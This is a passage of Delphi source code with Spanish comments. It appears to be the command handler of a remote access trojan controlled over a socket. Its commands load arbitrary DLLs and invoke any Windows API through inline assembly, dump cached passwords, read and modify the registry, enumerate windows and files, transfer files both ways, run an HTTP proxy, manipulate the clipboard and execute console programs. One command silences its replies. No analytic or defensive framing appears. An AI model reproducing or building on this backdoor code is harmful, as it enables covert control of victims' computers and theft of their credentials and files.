  If (ResOp = 'XOR') then RetV := RetV xor StrToIntDef(GetParamByNum(sr, ' ', 2), 0);
  If (ResOp = 'MUL') then RetV := RetV * StrToIntDef(GetParamByNum(sr, ' ', 2), 0);
  If (ResOp = 'DIV') then RetV := RetV div StrToIntDef(GetParamByNum(sr, ' ', 2), 0);
end;

//Devuleve la direccion de la DLL
function GetHandleLibrary(pathstr : string) : LongWord;
begin
    Result := LoadLibrary(PChar(pathstr));
end;

//Descarga la libreria (DLL)
procedure UnLoadLibrary();
begin
    FreeLibrary (hlib);
    hlib := 0;
end;

//Devuleve un puntero a la API
function GetHandleFunction(funcstr : string) : Pointer;
begin
    Result := GetProcAddress(hlib, PChar(funcstr));
end;

function CallFunc(apar: array of Pointer; fhdl : Pointer) : Integer; stdcall;
asm
      MOV ECX,[EAX + 28]    {Pasa el octavo parametro}
      MOV ECX,[ECX]
      PUSH ECX
      MOV ECX,[EAX + 24]    {Pasa el septimo parametro}
      MOV ECX,[ECX]
      PUSH ECX
      MOV ECX,[EAX + 20]    {Pasa el sexto parametro}
      MOV ECX,[ECX]
      PUSH ECX
      MOV ECX,[EAX + 16]    {Pasa el quinto parametro}
      MOV ECX,[ECX]
      PUSH ECX
      MOV ECX,[EAX + 12]    {Pasa el cuarto parametro}
      MOV ECX,[ECX]
      PUSH ECX
      MOV ECX,[EAX + 8]     {Pasa el tercer parametro}
      MOV ECX,[ECX]
      PUSH ECX
      MOV ECX,[EAX + 4]     {Pasa el segundo parametro}
      MOV ECX,[ECX]
      PUSH ECX
      MOV ECX,[EAX + 0]     {Pasa el primer parametro}
      MOV ECX,[ECX]
      PUSH ECX
      //LLama a la funcion
      CALL fhdl
      //Devuelve el resultado
      MOV @Result,EAX
end;

//Crea una estructura
//Todos los valores a los que apunta el array de punteros,
//son movidos dentro del espacio de memoria creado anteriormente.
procedure Element(apar: Pointer; offst : Integer; value : Pointer); stdcall;
asm
      MOV ECX, DWORD PTR apar  //Almacena la posicion de mem. en ECX
      ADD ECX, offst  //Mueve el puntero distancia del offset
      MOV EAX, DWORD PTR value  //Almacena la posicion de mem. en EAX
      MOV EAX, [EAX]  //El cotnenido de EAX se guarda en EAX
      MOV [ECX], EAX  //EL contenido de EAX se alamcena en donde apunta ECX
end;

//Toma los parametros de la llamada a la API (RAPI params)
function APICall(allparams : string; opera : Byte) : Integer;
var
   strtmp: array [0..8] of HidroVar;
   poitmp: array [0..20] of Pointer;   //Array para paso de parametros de la API y estrucutras
   palabra, tip : string;
   i, ERRORV:integer;
begin
   FillChar(strtmp, SizeOf(strtmp), 0);
   If (opera = 1) then GetMem(Struc, 80);   //Maximo disponible para un estrucutura
   palabra:=' ';
   i:=0;
   //Toma los parametros de la cadena
   //para signo @ le corresponde un integer
   //para signo $ le corresponde un AnsiString
   while (palabra <> '') do begin   //Mintras existan parametros
     palabra := '';
     palabra := GetParamByNum(allparams, ' ', i + 1);
     If (i > 8) and (opera = 0) then break;   //Maximo de API es ocho parametros
     If (i > 20) and (opera = 1) then break;   //Maximo de stru es diez parametros

     If (palabra = '') and (opera = 0) then palabra := '@0';
     If (palabra = '') and (opera = 1) then Exit;

     tip := copy(palabra,1,1);   //Contiene la marca de tipo de parametro

     if (tip = '@') Or (palabra = 'RET') then begin
        strtmp[i].XType := hPtToPt;
        if (Copy(palabra,2,1) = '>') then begin
          try
          strtmp[i].XType := hPtToPt;
          strtmp[i].XPtToPt.SrcDta := StrToIntDef(copy(palabra,3,length(palabra)), 0);
          strtmp[i].XPtToPt.PtrSrc := @strtmp[i].XPtToPt.SrcDta;
          poitmp[i] := @strtmp[i].XPtToPt.PtrSrc;
          except exit; end;
        end else begin
          If (palabra = 'RET') then
             strtmp[i].XPtToPt.SrcDta := RetV
          else strtmp[i].XPtToPt.SrcDta := StrToIntDef(copy(palabra,2,length(palabra)), 0);
          poitmp[i] := @strtmp[i].XPtToPt.SrcDta;
        end;
     end;

     if (tip = '$') then begin
        try
        if (Copy(palabra,2,1) = '>') then SetLength(palabra, StrToIntDef(Copy(palabra,3,length(palabra)), 1));
        strtmp[i].XType := 11;
        strtmp[i].XAnsiString := PAnsiString(copy(palabra,2,length(palabra)));
        poitmp[i] := @strtmp[i].XAnsiString;
        except Exit; end;
     end;

     if (tip = '#') then begin
        if (Copy(palabra,2,1) = '>') then begin
          try
          strtmp[i].XType := 1;
          strtmp[i].XPtToPt.SrcCar := StrToIntDef(copy(palabra,3,length(palabra)), 0);
          strtmp[i].XPtToPt.PtrSrc := @strtmp[i].XPtToPt.SrcCar;
          poitmp[i] := @strtmp[i].XPtToPt.PtrSrc;
          except Exit; end;
        end else begin
          try
          strtmp[i].XType := 1;
          strtmp[i].XCardinal := StrToCardinal(copy(palabra,2,length(palabra)));  //StrToIntDef(copy(palabra,2,length(palabra)), 0);
          poitmp[i] := @strtmp[i].XCardinal;
          except Exit; end;
        end;
     end;

     if (palabra = '>STRU') then begin
        strtmp[i].XType := 99;
        strtmp[i].XPointer := @Struc;
        poitmp[i]:= @strtmp[i].XPointer;
     end;

     if (palabra = 'STRU') then begin
        strtmp[i].XType := 99;
        strtmp[i].XPointer := @Struc;
        poitmp[i]:= strtmp[i].XPointer;
     end;

     if (palabra = 'SOCK') then begin   {Handle del socket actual}
         strtmp[i].XPtToPt.SrcDta := GralSocket;
         poitmp[i] := @strtmp[i].XPtToPt.SrcDta;
     end;

     //Todos lo parametros pasados tanto en fucniones como estrucuturas
     //ocupan 4 bytes en memoria (32bits), por que generalemnte son punteros
     //a cadenas, u otros datos.
     if opera = 1 then begin
        Element(Struc, (i * 4), poitmp[i]);
     end;

     inc(i);  //Incremneta variable i
   end;

   //Llama a la rutina de llamada de la API
   if opera = 0 then begin
     try
        RetV := CallFunc(poitmp,func);
     except
        exit;
     end;

     for i:= 0 to 8 do begin
       If (strtmp[i].XType = 11) then begin
          Dataret := dataret + ' - ' + PChar(strtmp[i].XAnsiString);
       end;
       If (strtmp[i].XType >= hPtToPt) then begin
          Dataret := dataret + ' - ' + IntToStr(strtmp[i].XPtToPt.SrcDta);
       end;
     end;
     Result:=RetV;   //Guarda el resultado por si se requiere mediante la variable RET.
   end;
end;

//Toma las instrucciones y llama a las rutinas correspondientes
function CommandProcess(strins : string) : Integer;
var
  tmpvar : string;
begin
   DataRet := '';
   tmpvar := GetParamByNum(strins,' ',1);
   if (tmpvar = 'LLIB') then begin   //Cargar libreria
      if hlib <> 0 then UnLoadLibrary;
      hlib := GetHandleLibrary(GetParamByNum(strins,' ',2));
      if (hlib = 0) then Dataret := 'LibErr';
   end else
   if (tmpvar = 'APIN') then begin   //Tomar funcion (API)
      func := GetHandleFunction(GetParamByNum(strins,' ',2));
      if (func = nil) then Dataret:='ApiErr';
   end else
   if (tmpvar = 'RAPI') then begin   //Ejecutar funcion (API)
      Delete(strins,1,length(tmpvar)+1);
      if (func <> nil) then Result := APICall(strins, 0)
      else Dataret := 'ApiErr';
   end else
   if (tmpvar = 'STRU') then begin   //Paso de estrucutras
      Delete(strins,1,length(tmpvar)+1);
      APICall(strins, 1);
   end else
   if (tmpvar = 'STRO') then begin   //Libera memoria de estrucutura
      FreeMem(Struc, 80);
   end else
   if (tmpvar = 'ULIB') then begin   //Descargar libreria
      UnLoadLibrary;
   end else
   if (tmpvar = 'OPRT') then begin   //Leer del puerto (puertos fisicos)
      PORTOut(StrToIntDef(GetParamByNum(strins,' ',2), 0), StrToIntDef(GetParamByNum(strins,' ',3), 0));
   end else
   if (tmpvar = 'NINF') then begin   //Informacion de RED
      DataRet := #13#10;
      Delete(strins,1, Length(tmpvar) + 1);
      NetInfoProc(strins);
      Result := 0;
   end else
   if (tmpvar = 'GAWN') then begin   //Informacin sobre ventanas activas
      DataRet := #13#10;
      WinCTGet(GetParamByNum(strins,' ',2));
      Result := 0;
   end else
   if (tmpvar = 'GFID') then begin   //Informacin sobre archivos en directorio
      DataRet := #13#10;
      WinFDGet(GetParamByNum(strins,' ',2));
      Result := 0;
   end else
   if (tmpvar = 'GPWS') then begin   //Cached Passwords
      DataRet := #13#10;
      GetWinPws();
      Result := 0;
   end else
   if (tmpvar = 'OKEY') then begin   //Abre una clave del registro
      DataRet := #13#10;
      Delete(strins,1, Length(tmpvar) + 1);
      RegOpenKey(strins);
      Result := TKEY;
   end else
   if (tmpvar = 'KCLS') then begin   //Cierra una clave del registro
      if TKEY <> 0 then Result := RegCloseKey(TKEY);
   end else
   if (tmpvar = 'CVAL') then begin   //Crea o modifica un valor del registro
      DataRet := #13#10;
      Delete(strins,1, Length(tmpvar) + 1);
      RegModValue(strins);
      Result := TKEY;
   end else
   if (tmpvar = 'DVAL') then begin   //Borra un valor del registro
      if TKEY <> 0 then RegDelValue(GetParamByNum(strins, ' ', 2));
      Result := 0;
   end else
   if (tmpvar = 'CKEY') then begin   //Crea una nueva clave en el registro
      if TKEY <> 0 then RegCreaKey(GetParamByNum(strins, ' ', 2));
      Result := 0;
   end else
   if (tmpvar = 'DKEY') then begin   //Borra una clave del registro
      if TKEY <> 0 then RegDelKey(GetParamByNum(strins, ' ', 2));
      Result := 0;
   end else
   if (tmpvar = 'GVLS') then begin   //Devuelve listado de valores de una clave abierta
      if TKEY <> 0 then RegEnumVal(GetParamByNum(strins, ' ', 2), 1);
      Result := 0;
   end else
   if (tmpvar = 'GKYS') then begin   //Devuelve listado de sub-claves de una clave abierta
      if TKEY <> 0 then RegEnumVal(GetParamByNum(strins, ' ', 2), 0);
      Result := 0;
   end else
   if (tmpvar = 'GALL') then begin   //Devuelve listado de sub-claves de una clave abierta
      DataRet := '';
      if TKEY <> 0 then begin
        RegEnumVal(GetParamByNum(strins, ' ', 1), 0);
        RegEnumVal(GetParamByNum(strins, ' ', 2), 1);
      end;
      Result := 0;
   end else
   if (tmpvar = 'GVAL') then begin   //Devuelve listado de valores de una clave abierta
      if TKEY <> 0 then DataRet := PChar(GetValue(GetParamByNum(strins, ' ', 2), 0, TKEY));
      Result := 0;
   end else
   if (tmpvar = 'CHLD') then begin   //Listado de ventanas hijas
      DataRet := #13#10;
      WinChildGet(GetParamByNum(strins, ' ', 2));
      Result := 0;
   end else
   if (tmpvar = 'GFLE') then begin   //DOWNLOAD FILE
      DataRet := 'TrfErr';
      Delete(strins,1, Length(tmpvar) + 1);
      TransferFile(strins, 0);
   end else
   if (tmpvar = 'PFLE') then begin   //UPLOAD FILE
      DataRet := 'TrfErr';
      Delete(strins,1, Length(tmpvar) + 1);
      TransferFile(strins, 1);
   end else
   if (tmpvar = 'PRXY') then begin   //PROXY HTTP SERVER
      DataRet := 'PrxErr';
      Delete(strins,1, Length(tmpvar) + 1);
      ExecuteProxy(strins);
   end else
   if (tmpvar = 'GCLB') then begin   //Get, Put, Delete ClipBoard Data
      DataRet := 'ClbErr';
      Delete(strins,1, Length(tmpvar) + 1);
      GetDataClipboard(strins);
   end else
   if (tmpvar = 'XDOS') then begin   //eXecute DOS console aplication
      DataRet := GetParamByNum(strins,' ',2);
      DosConsoleApp(DataRet);
   end else
   if (tmpvar = 'GHBN') then begin   //Get Host By Name (API)
      Dataret := GetIPHostName(PChar(GetParamByNum(strins,' ',2)));
   end else
   if (tmpvar = 'GHIP') then begin   //Listado de direcciones IP del host
      Dataret := GetIPHostName(nil);
   end else
   if (tmpvar = 'LRAS') then begin   //Listado de conexiones RAS
      ListRAS();
      Result := 0;
   end else
   if (tmpvar = 'RET?') then begin   //Hace operaciones sobre el resultado
      Delete(strins,1, Length(tmpvar) + 1);
      SetResultValue(strins);
      Result := RetV;
   end else
   if (tmpvar = 'BLOK') then begin   //No devuelve mensajes
      SendDataVar := Not SendDataVar;
   end;
end;

end.
